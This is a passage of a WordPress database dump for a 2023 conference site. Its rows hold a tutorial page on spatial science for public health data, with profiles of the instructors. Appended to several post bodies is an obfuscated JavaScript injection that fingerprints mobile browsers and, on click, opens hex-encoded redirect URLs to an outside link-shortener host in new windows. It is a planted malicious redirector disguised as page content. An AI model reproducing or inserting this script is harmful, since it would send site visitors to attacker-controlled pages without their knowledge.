_0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','TUTORIAL','','inherit','closed','closed','','3670-revision-v1','','','2023-02-02 07:17:43','2023-02-02 07:17:43','',3670,'https://gsw2023.com/?p=3680',0,'revision','',0),
(3681,1,'2023-02-02 07:26:23','2023-02-02 07:26:23','<p>[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3685\" img_size=\"1200x1000\"][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\"><strong>Public Health Data Handling, Analysis and Visualisation using Spatial Science</strong></h5>\n<h6></h6>\n<h6><strong>Tutorial Topic</strong></h6>\n<p style=\"text-align: justify;\"><strong><span style=\"font-size: 12pt;\">The past century has seen an unprecedented burden of infectious, chronic and vector-borne diseases that threaten the public and global health. There are also direct implications on wildlife populations. Understanding the spatial processes and temporal dynamics are important for guiding policy informed decisions. Policymakers, public health officials, and academic researchers are key stakeholders in the fight against diseases. For instance, the recent COVID-19 pandemic has generated tremendous amount of data which is of prime importance. The availability of spatial tools with analytical &amp; visualization capability provided meaningful insights in handling public health data for scientific understanding of disease trends and patterns. Hence, there is a clear need of simple one-stop solution that is backed by reliable data source.</span></strong></p>\n<p style=\"text-align: justify;\"><strong><span style=\"font-size: 12pt;\">In this tutorial, we focus on techniques and spatial tools for (i) optimal data collection on disease occurrence and surveillance through citizen-centric approach, (ii) machine learning based statistical modelling tools for active surveillance, and (iii) analysing the spatial complexity of diseases through visualization support.</span></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\">Short Profile &amp; Affiliation of Instructors</h4>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<!-- wp:paragraph --></p>\n<p>&nbsp;</p>\n<p><img class=\"alignnone wp-image-3691\" src=\"https://gsw2023.com/wp-content/uploads/2023/02/tut1.jpg\" alt=\"\" width=\"79\" height=\"106\" /></p>\n<h5><strong>DR.Sameer Saran</strong></h5>\n<p>Geoinformatics Department, Indian Institute of Remote Sensing, Dehradun, INDIA</p>\n<p><!-- /wp:paragraph --> <!-- wp:paragraph --><strong>ISPRS Chair, WG IV/10</strong></p>\n<p><!-- /wp:paragraph --> <!-- wp:paragraph -->Dr. Sameer Saran is a Senior Scientist and Head, Geoinformatics Department at Indian Institute of Remote Sensing (ISRO). He is currently serving as Deputy General Secretary of AARS representing India. He has also served as Co-Chair for ISPRS TC V/3 working group on Geospatial Technology and Citizen Science for the year 2016-22.  His interest is Web GIS, spatial database &amp; modelling, citizen science, 3D city modelling &amp; geo-health.</p>\n<p>&nbsp;</p>\n<p><!-- /wp:paragraph -->[/vc_column_text][vc_separator border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<img class=\"alignnone size-full wp-image-3694\" src=\"https://gsw2023.com/wp-content/uploads/2023/02/tut2.jpg\" alt=\"\" width=\"75\" height=\"95\" /></p>\n<p class=\"fancy-title entry-title start-animation-done start-animation\">Dr.Frank B Osei</p>\n<p>Faculty of Geo-Information Science &amp; Earth Observation, University of Twente, The NL</p>\n<p><strong>ISPRS Co-Chair, WG IV/10</strong> Dr. F. B. Osei is a Faculty of Geo-Information Science and Earth Observation (ITC) in Department of Earth Observation Science (EOS), University of Twente, the Netherlands. He is editorial member of Spatial Statistics, Int. J. of Statistics in Medical Research, Geospatial Health, etc. His research interests are in GIS, geo-health, social sciences, life sciences, earth and environmental sciences.[/vc_column_text][vc_separator border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<img class=\"alignnone size-full wp-image-3697\" src=\"https://gsw2023.com/wp-content/uploads/2023/02/tut3.jpg\" alt=\"\" width=\"71\" height=\"79\" /></p>\n<p>Dr. Dilek KOC-SAN</p>\n<p>Department of Urban and Regional Planning, Akdeniz University, TURKEY</p>\n<p><strong>ISPRS Co-Chair, WG IV/10</strong></p>\n<p>Dr. Dilek KOC-SAN is a</p>\n<p>Faculty of Architecture in Department of Urban and Regional Planning, Akdeniz University. In 2009, she received PhD degree from Middle East Technical University, Dept. of Geodetic &amp; Geographic Information Technologies. Her research interests are GIS, image classification &amp; processing, automatic object extraction &amp; multi-criteria decision analysis.[/vc_column_text][vc_separator border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<img class=\"alignnone size-full wp-image-3699\" src=\"https://gsw2023.com/wp-content/uploads/2023/02/tut4.jpg\" alt=\"\" width=\"74\" height=\"82\" /></p>\n<p>Dr. Priyanka Singh</p>\n<p>School of Computer Sciences, University of Petroleum &amp; Energy Studies, Dehradun, INDIA</p>\n<p><strong>ISPRS Secretary, WG IV/10</strong> Dr. Priyanka Singh is a Faculty of Computer Science in University of Petroleum and Energy Studies, India. She received her PhD in Data Science from IIT(ISM) and IIRS (ISRO), India in 2019. She received international and national awards in field of spatial sciences. Her research interests are Applied machine learning, WebGIS, citizen science, predictive analytics, geo-health and spatial modelling and analytics.[/vc_column_text][vc_separator border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Public Health Data Handling, Analysis and Visualisation using Spatial Science','','publish','closed','closed','','public-health-data-handling-analysis-and-visualisation-using-spatial-science','','','2023-02-07 01:22:33','2023-02-07 01:22:33','',0,'https://gsw2023.com/?post_type=dt_portfolio&#038;p=3681',0,'dt_portfolio','',0),
(3682,1,'2023-02-02 07:25:52','2023-02-02 07:25:52','','tutm1','','inherit','open','closed','','tutm1','','','2023-02-02 07:25:52','2023-02-02 07:25:52','',3681,'https://gsw2023.com/wp-content/uploads/2023/02/tutm1.jpg',0,'attachment','image/jpeg',0),
(3683,1,'2023-02-02 07:26:23','2023-02-02 07:26:23','','Public Health Data Handling, Analysis and Visualisation using Spatial Science','','inherit','closed','closed','','3681-revision-v1','','','2023-02-02 07:26:23','2023-02-02 07:26:23','',3681,'https://gsw2023.com/?p=3683',0,'revision','',0),
(3684,1,'2023-02-02 07:29:50','2023-02-02 07:29:50','<p>[vc_row][vc_column][dt_portfolio_masonry content_alignment=\"center\" image_border_radius=\"10px\" image_paddings=\"15px 0px 15px 0px\" post_date=\"n\" post_category=\"n\" post_author=\"n\" post_comments=\"n\" content_font_style=\"normal:bold:none\" read_more_button=\"off\" project_icon_border_width=\"0px\" posts_offset=\"0\" category=\"69\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g 